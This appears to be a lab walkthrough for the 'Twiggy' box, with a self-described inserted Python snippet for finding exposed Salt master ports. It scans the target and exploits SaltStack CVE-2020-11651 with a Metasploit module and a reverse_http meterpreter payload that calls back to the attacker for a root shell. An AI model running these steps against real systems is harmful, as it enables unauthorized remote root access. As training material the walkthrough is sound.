Twiggy
nmap
mkdir nmap
sudo rustscan -a 192.168.234.62 --ulimit 5000 -- -T4 -A -oA nmap/all-ports-service-scan
ZeroMQ is running on ports 4505 and 4506.

After some Googlefu, I found this service is vulnerable to Remote Code Execution (CVE-2020-11651).
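From the defender's side, the same scan output can be used to audit which hosts expose the Salt master ports found above. This is an added example, not part of the original write-up: it parses nmap XML of the kind `-oA` writes alongside the other formats, and the sample XML, addresses and function name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Salt master ports: 4505 is the publish port, 4506 the request server.
SALT_PORTS = (4505, 4506)

# Constructed sample in the shape of nmap XML output; addresses are
# documentation-range placeholders, not hosts from the write-up.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/></port>
      <port protocol="tcp" portid="4505"><state state="open"/></port>
      <port protocol="tcp" portid="4506"><state state="open"/></port>
    </ports>
  </host>
  <host>
    <address addr="192.0.2.11" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/></port>
      <port protocol="tcp" portid="4506"><state state="filtered"/></port>
    </ports>
  </host>
</nmaprun>"""


def exposed_salt_masters(xml_text):
    """Map each host address to the Salt master ports nmap reported open."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        address = host.find("address")
        if address is None:
            continue
        open_ports = []
        for port in host.iter("port"):
            state = port.find("state")
            # Only count TCP ports nmap marked "open" (not filtered/closed).
            if (port.get("protocol") == "tcp" and state is not None
                    and state.get("state") == "open"
                    and int(port.get("portid")) in SALT_PORTS):
                open_ports.append(int(port.get("portid")))
        if open_ports:
            findings[address.get("addr")] = sorted(open_ports)
    return findings


if __name__ == "__main__":
    for addr, ports in exposed_salt_masters(SAMPLE_XML).items():
        print(f"{addr}: Salt master ports reachable {ports}; restrict to minion networks")
```

Any host this reports should have 4505/4506 firewalled to the minion networks only and its Salt master checked against the vendor's fix for CVE-2020-11651.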
Exploitation
Open msfconsole and search for cve-2020-11651.

Let's choose exploit #1 and set the necessary variables:
use exploit/linux/misc/saltstack_salt_unauth_rce
set rhost <target>
set lhost tun0
set lport 4506
set srvhost tun0
set srvport 4506
set payload python/meterpreter/reverse_http
run
After running the exploit you should receive a root meterpreter.
